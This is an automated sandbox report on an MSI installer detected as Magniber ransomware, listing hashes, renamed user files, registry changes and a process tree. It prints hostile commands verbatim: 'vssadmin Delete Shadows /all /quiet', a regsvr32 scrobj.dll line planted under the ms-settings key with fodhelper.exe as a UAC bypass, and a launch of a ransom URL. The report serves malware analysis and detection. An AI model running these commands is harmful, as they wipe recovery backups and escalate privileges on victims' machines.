Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 14-09-2022 23:15

Static task: static1
Behavioral task: behavioral1
  Sample: ddf798fa09f7c72f9fec4478841990d7.msi
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: ddf798fa09f7c72f9fec4478841990d7.msi
  Resource: win10v2004-20220812-en

General
Target: ddf798fa09f7c72f9fec4478841990d7.msi
Size: 92KB
MD5: ddf798fa09f7c72f9fec4478841990d7
SHA1: 42b8bc580bd77c330432fb7cf6d9b8c8212961bd
SHA256: b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a
SHA512: fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425
SSDEEP: 768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\3064_104092216\us_tv_and_film.txt
Signatures

Detect magniber ransomware (2 IoCs)
resource | yara_rule
behavioral2/memory/1928-148-0x000001ADDF6E0000-0x000001ADDF6EC000-memory.dmp | family_magniber
behavioral2/memory/2408-149-0x000001D172BC0000-0x000001D172BC3000-memory.dmp | family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Blocklisted process makes network request (3 IoCs)
flow | pid | Process
8 | 4888 | msiexec.exe
9 | 4888 | msiexec.exe
11 | 4888 | msiexec.exe
Modifies extensions of user files (6 IoCs)
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\SendSync.tiff => C:\Users\Admin\Pictures\SendSync.tiff.vpkrzajx | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.vpkrzajx | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\GroupResolve.png => C:\Users\Admin\Pictures\GroupResolve.png.vpkrzajx | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\HideApprove.png => C:\Users\Admin\Pictures\HideApprove.png.vpkrzajx | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\LockInitialize.png => C:\Users\Admin\Pictures\LockInitialize.png.vpkrzajx | MsiExec.exe
File opened for modification | C:\Users\Admin\Pictures\SendSync.tiff | MsiExec.exe
Loads dropped DLL (1 IoCs)
pid | Process
1928 | MsiExec.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
Suspicious use of SetThreadContext (3 IoCs)
description | pid | Process | procid_target
PID 1928 set thread context of 2408 | 1928 | MsiExec.exe | 55
PID 1928 set thread context of 2448 | 1928 | MsiExec.exe | 54
PID 1928 set thread context of 2744 | 1928 | MsiExec.exe | 35

Drops file in Program Files directory (2 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d7749718-9762-451c-9113-9b7e51bca10e.tmp | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220915011550.pma | setup.exe

Drops file in Windows directory (9 IoCs)
description | ioc | Process
File created | C:\Windows\Installer\e56d69e.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e56d69e.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID7E6.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIDCC9.tmp | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{0311111A-8CE9-4820-9F74-1D1FFF54BBAB} | msiexec.exe
File created | C:\Windows\Installer\e56d6a0.msi | msiexec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
5672 | vssadmin.exe
5708 | vssadmin.exe
5740 | vssadmin.exe
2984 | vssadmin.exe
3240 | vssadmin.exe
4280 | vssadmin.exe
Modifies registry class (15 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
pid | Process
1952 | msiexec.exe
1952 | msiexec.exe
1928 | MsiExec.exe
1928 | MsiExec.exe
4260 | msedge.exe
4260 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3560 | identity_helper.exe
3560 | identity_helper.exe

Suspicious behavior: MapViewOfSection (3 IoCs)
pid | Process
1928 | MsiExec.exe
1928 | MsiExec.exe
1928 | MsiExec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (9 IoCs)
pid | Process
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeShutdownPrivilege | 4888 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4888 | msiexec.exe
Token: SeSecurityPrivilege | 1952 | msiexec.exe
Token: SeCreateTokenPrivilege | 4888 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 4888 | msiexec.exe
Token: SeLockMemoryPrivilege | 4888 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4888 | msiexec.exe
Token: SeMachineAccountPrivilege | 4888 | msiexec.exe
Token: SeTcbPrivilege | 4888 | msiexec.exe
Token: SeSecurityPrivilege | 4888 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 4888 | msiexec.exe
Token: SeLoadDriverPrivilege | 4888 | msiexec.exe
Token: SeSystemProfilePrivilege | 4888 | msiexec.exe
Token: SeSystemtimePrivilege | 4888 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 4888 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 4888 | msiexec.exe
Token: SeCreatePagefilePrivilege | 4888 | msiexec.exe
Token: SeCreatePermanentPrivilege | 4888 | msiexec.exe
Token: SeBackupPrivilege | 4888 | msiexec.exe
Token: SeRestorePrivilege | 4888 | msiexec.exe
Token: SeShutdownPrivilege | 4888 | msiexec.exe
Token: SeDebugPrivilege | 4888 | msiexec.exe
Token: SeAuditPrivilege | 4888 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 4888 | msiexec.exe
Token: SeChangeNotifyPrivilege | 4888 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 4888 | msiexec.exe
Token: SeUndockPrivilege | 4888 | msiexec.exe
Token: SeSyncAgentPrivilege | 4888 | msiexec.exe
Token: SeEnableDelegationPrivilege | 4888 | msiexec.exe
Token: SeManageVolumePrivilege | 4888 | msiexec.exe
Token: SeImpersonatePrivilege | 4888 | msiexec.exe
Token: SeCreateGlobalPrivilege | 4888 | msiexec.exe
Token: SeBackupPrivilege | 4960 | vssvc.exe
Token: SeRestorePrivilege | 4960 | vssvc.exe
Token: SeAuditPrivilege | 4960 | vssvc.exe
Token: SeBackupPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1952 | msiexec.exe
Token: SeRestorePrivilege | 1952 | msiexec.exe
Suspicious use of FindShellTrayWindow (5 IoCs)
pid | Process
4888 | msiexec.exe
4888 | msiexec.exe
3064 | msedge.exe
3064 | msedge.exe
3064 | msedge.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 1952 wrote to memory of 4264 | 1952 | msiexec.exe | 91
PID 1952 wrote to memory of 4264 | 1952 | msiexec.exe | 91
PID 1952 wrote to memory of 1928 | 1952 | msiexec.exe | 93
PID 1952 wrote to memory of 1928 | 1952 | msiexec.exe | 93
PID 2408 wrote to memory of 2656 | 2408 | sihost.exe | 96
PID 2408 wrote to memory of 2656 | 2408 | sihost.exe | 96
PID 2448 wrote to memory of 4976 | 2448 | svchost.exe | 94
PID 2448 wrote to memory of 4976 | 2448 | svchost.exe | 94
PID 2744 wrote to memory of 1652 | 2744 | taskhostw.exe | 95
PID 2744 wrote to memory of 1652 | 2744 | taskhostw.exe | 95
PID 1928 wrote to memory of 4468 | 1928 | MsiExec.exe | 98
PID 1928 wrote to memory of 4468 | 1928 | MsiExec.exe | 98
PID 4468 wrote to memory of 3064 | 4468 | cmd.exe | 100
PID 4468 wrote to memory of 3064 | 4468 | cmd.exe | 100
PID 3064 wrote to memory of 2184 | 3064 | msedge.exe | 102
PID 3064 wrote to memory of 2184 | 3064 | msedge.exe | 102
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 528 | 3064 | msedge.exe | 105
PID 3064 wrote to memory of 4260 | 3064 | msedge.exe | 106
PID 3064 wrote to memory of 4260 | 3064 | msedge.exe | 106
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
PID 3064 wrote to memory of 1712 | 3064 | msedge.exe | 108
Processes
(Each entry: image path, command line, triggered signatures, PID. Nesting shows the parent/child relationship recorded in the process tree.)

- C:\Windows\system32\taskhostw.exe
  Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  Signatures: Suspicious use of WriteProcessMemory
  PID: 2744
  - C:\Windows\system32\regsvr32.exe
    Command line: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
    Signatures: Modifies registry class
    PID: 1652
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 3904
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 3556
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 1496
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 4280
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 5276
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 5440
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 5572
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 5740

- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  Signatures: Suspicious use of WriteProcessMemory
  PID: 2448
  - C:\Windows\system32\regsvr32.exe
    Command line: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
    Signatures: Modifies registry class
    PID: 4976
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 3672
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 2756
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 1600
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 3240
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 5252
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 5412
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 5552
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 5708

- C:\Windows\system32\sihost.exe
  Command line: sihost.exe
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  PID: 2408
  - C:\Windows\system32\regsvr32.exe
    Command line: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
    Signatures: Modifies registry class
    PID: 2656
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 4300
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 2252
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 3568
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 2984
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID: 5260
    - C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID: 5400
      - C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID: 5528
        - C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          Signatures: Interacts with shadow copies
          PID: 5672

- C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ddf798fa09f7c72f9fec4478841990d7.msi
  Signatures: Blocklisted process makes network request; Enumerates connected drives; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
  PID: 4888

- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures: Enumerates connected drives; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  PID: 1952
  - C:\Windows\system32\srtasks.exe
    Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
    PID: 4264
  - C:\Windows\System32\MsiExec.exe
    Command line: C:\Windows\System32\MsiExec.exe -Embedding 0CB3A02F93E90B8853234F11696B31B8
    Signatures: Modifies extensions of user files; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    PID: 1928
    - C:\Windows\System32\cmd.exe
      Command line: cmd /c "start microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx^&1^&60119478^&75^&375^&2219041
      Signatures: Suspicious use of WriteProcessMemory
      PID: 4468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx&1&60119478&75&375&2219041
        Signatures: Adds Run key to start application; Enumerates system info in registry; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
        PID: 3064
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad80d46f8,0x7ffad80d4708,0x7ffad80d4718
          PID: 2184
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
          PID: 528
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
          Signatures: Suspicious behavior: EnumeratesProcesses
          PID: 4260
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
          PID: 1712
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
          PID: 2008
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
          PID: 1036
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
